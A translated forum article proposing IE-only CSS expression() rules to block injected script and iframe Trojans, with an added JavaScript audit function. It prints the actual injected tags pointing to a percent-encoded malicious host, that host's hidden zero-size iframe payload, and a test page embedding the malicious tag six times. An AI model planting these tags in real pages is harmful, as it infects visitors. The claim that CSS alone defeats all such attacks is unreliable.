Two lines of code to solve all web Trojans (including iframe/script Trojans)

Source: Internet
Author: User

It is the injected-Trojan ("hanging the horse") problem again. Lately I have been feeling the pressure and it is giving me a headache: more and more people are adding me on QQ or MSN, and my own work has been busy recently. Still, thinking about it, I need to make time to help everyone.

Not long ago, "http://bbs.blueidea.com/thread-2818052-1-1.html line of code to solve the IFRAME Trojan (including server injection, client ARP injection, etc.)" was well received by many friends; it really is a good shelter from the wind and rain. But the injection method has changed, just as I expected: the <script> Trojan is now popular. I have seen several users' sites hit this way, with the following added at the top or the bottom of the page:

Note: the following address hosts a Trojan; do not visit it casually:

<script src=http://%76%63%63%64%2e%63%6e></script>
<script src=http://%76%63%63%64%2e%63%6e></script>
<script src=http://%76%63%63%64%2e%63%6e></script>
<script src=http://%76%63%63%64%2e%63%6e></script>
<script src=http://%76%63%63%64%2e%63%6e></script>
<script src=http://%76%63%63%64%2e%63%6e></script>
<script src=http://%76%63%63%64%2e%63%6e></script>
<script src=http://%76%63%63%64%2e%63%6e></script>

Ugh, the same <script> tag inserted n times in a row. My computer is fully patched, so I accessed http://%76%63%63%64%2E%63%6E directly (or you can download it with Xunlei/Thunder), and, well, this is what comes back:

document.write("<div style='display:none'>")
document.write("<iframe src=http://a.158dm.com/b1.htm?id=017 width=0 height=0></iframe>")
document.write("</div>")

Then I downloaded the file http://a.158dm.com/b1.htm with Xunlei (Thunder) and took a look: a mess of JS code. But I found a number that looked like a QQ number, added it directly to have a look and, ugh, it turned out to be an organization that professionally supplies web Trojans. Hey, what a world. And their fees are quite high!

...
var kfqq, qqs="784378237"; qwfgsg="LLLL\\XXXXXLD"; kfqq = qqs;
... (followed by n more lines of statistics JS code)

Given the situation above, I could not just stand by, so I set about finding a way. I had a bowl of mung bean porridge, with quite a lot of sugar in it, and it was good. Then the method came to me; a little analysis gives the answer. Let's look at the characteristics of the <script> Trojan:

<script src=http://%76%63%63%64%2e%63%6e></script>

Right: the script's src generally points to an external domain, that is, the src begins with http, whereas a script from your own site generally does not need the http prefix. Now look at the Trojan's true form: inside, it still writes out an IFRAME, JS code, or other <object> code. No matter how many there are, we kill them all.
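The same src test can also be run over page source on the server, to find injected tags before any visitor loads them. The following is an added example, not code from the original article: the function names are hypothetical, the SAMPLE input and its host x.test are constructed, and it goes beyond the article's test by also treating protocol-relative // sources as off-site.

```javascript
// Added example: audits page source for off-site <script>/<iframe> tags.
function attr(tag, name) {
  // Accepts name="v", name='v' and unquoted name=v (the form the injected tags use).
  const re = new RegExp("\\s" + name + "\\s*=\\s*(?:\"([^\"]*)\"|'([^']*)'|([^\\s>]+))", "i");
  const m = re.exec(tag);
  return m ? (m[1] || m[2] || m[3] || "").trim() : "";
}

function decodeUrl(url) {
  // Percent-encoded hosts hide the domain from plain-text searches; decode for the report.
  try { return decodeURIComponent(url).toLowerCase(); }
  catch (e) { return url.toLowerCase(); } // malformed escape: report as written
}

function findExternalTags(html) {
  const hits = new Map();
  const tagRe = /<(script|iframe)\b[^>]*>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const src = attr(m[0], "src");
    const low = src.toLowerCase();
    // The article's test: a src that begins with "http" is off-site.
    // Assumption added here: "//host/..." is off-site as well.
    if (low.indexOf("http") !== 0 && low.indexOf("//") !== 0) continue;
    const tag = m[1].toLowerCase();
    const url = decodeUrl(src);
    const key = tag + " " + url;
    const hit = hits.get(key) || { tag, url, count: 0, zeroSize: false };
    hit.count += 1; // the same tag repeated n times is typical of mass injection
    if (attr(m[0], "width") === "0" && attr(m[0], "height") === "0") hit.zeroSize = true;
    hits.set(key, hit);
  }
  return [...hits.values()];
}

// Constructed sample modelled on the article's test page; x.test is a placeholder host.
const SAMPLE = [
  '<script type="text/javascript" src="1.js"></script>',
  '<script src=http://%78%2e%74%65%73%74></script>',
  '<script src="HTTP://%78%2E%74%65%73%74" type="text/javascript"></script>',
  '<iframe src=http://x.test/b.htm width=0 height=0></iframe>',
  '<script src="//x.test/s.js"></script>',
  '<script src="/js/site.js" id="lhSearch"></script>',
].join("\n");

console.log(findExternalTags(SAMPLE));
```

Each returned entry gives the tag type, the decoded URL, how many times it occurs, and whether it is a zero-size iframe.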

Write the CSS along with me and we will take them out one by one. I wrote 5 different solutions; please test them all:

Solution 1:

iframe{n1ifm:expression(this.src='about:blank',this.outerHTML='');} /* This line of code solves the IFRAME Trojan problem! */
script{nojs1:expression((this.src.toLowerCase().indexOf('http')==0)?document.write('Trojan is successfully quarantined!'):'');}

Principle: convert the src of the <script> tag to lowercase, then check whether it is an external-domain JS file beginning with "http". If it is, the page content is cleared and "Trojan is successfully quarantined!" is written; otherwise the page displays normally.
Disadvantage: visitors cannot see the content of a page infected with the <script> Trojan.


Solution 2:

iframe{nifm2:expression(this.src='about:blank',this.outerHTML='');}
script{no2js:expression((this.src.toLowerCase().indexOf('http')==0)?document.close():'');}

Principle: document.close() forcibly closes the document.write() of the external-domain JS file. At that point the Trojan has not finished writing; only the part already buffered is output, and the rest is never written.


Solution 3:

iframe{ni3fm:expression(this.src='about:blank',this.outerHTML='');}
script{n3ojs:expression((this.src.toLowerCase().indexOf('http')==0)?document.execCommand('stop'):'');}

Principle: likewise, when an external-domain JS file is encountered, immediately call IE's proprietary execCommand method to stop all requests on the page, so the JS files that follow are also forced to stop downloading. It is just like clicking the browser's "Stop" button; this seems to be a way for JS to simulate IE's Stop button.

Solution 4:

iframe{nif4m:expression(this.src='about:blank',this.outerHTML='');}
script{noj4s:expression((this.src.indexOf('http')==0)?this.src='res://ieframe.dll/dnserror.htm':'');}

Principle: rewrite the src of the external-domain JS file to the address of IE's 404 error page, so that the external JS code is never downloaded.

Solution 5:

iframe{nifm5:expression(this.src='about:blank',this.outerHTML='');}
script{noj5s:expression((this.id.toLowerCase().indexOf('lh')!=0)?document.write('Trojan is successfully quarantined!'):'');}

In the fifth solution, the <script> tags in the page's own HTML source must carry an id prefixed with "lh" (the id is lowercased before the comparison), such as Lhweatherjsapi: <script src="***/**.js" id="Lhsearchjsapi"></script>

The page code below contains a Trojan address, and the Trojan is repeated 6 times in the page. Test it with the different solutions above and see how my research holds up! (This test carries some risk; make sure all patches are installed before testing.)

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>CSS code that quickly stops JS Trojans from running</title>
<style type="text/css" id="Linrstudio">
/*<![CDATA[*/
iframe{nhk1:expression(this.src='about:blank',this.outerHTML='');}
script{ngz1:expression((this.src.indexOf('http')==0)?document.close():'');}
/* For the latest Trojan-handling methods, watch: http://www.nihaoku.cn/ff/api.htm */
/*]]>*/
</style>
<body>
<script type="text/javascript" src="1.js"></script>
<script src=http://%76%63%63%64%2e%63%6e></script>
<script src="http://%76%63%63%64%2E%63%6E" type="text/javascript"></script>
<script src=http://%76%63%63%64%2e%63%6e></script>
I am 1 of the page itself
<script src=http://%76%63%63%64%2e%63%6e></script>
I am 2 of the page itself
<script src=http://%76%63%63%64%2e%63%6e></script>
I am 3 of the page itself
<script src=http://%76%63%63%64%2e%63%6e></script>
</body>

Here 1.js is the site's own script:

document.write("I am the JS file of this site");
document.write("

My test environment is:
Windows XP SP2 and Windows Vista SP1
IE6/IE7/IE8
All fully patched.

To sum up, every current method of planting page Trojans is defeated; CSS alone can solve all of these Trojan problems, and visitors will not easily be infected.

Everyone should still study this carefully and look for bugs in my code; anything unclear should be brought out and discussed so that the problem gets solved! Or, if you have a better approach, share it.

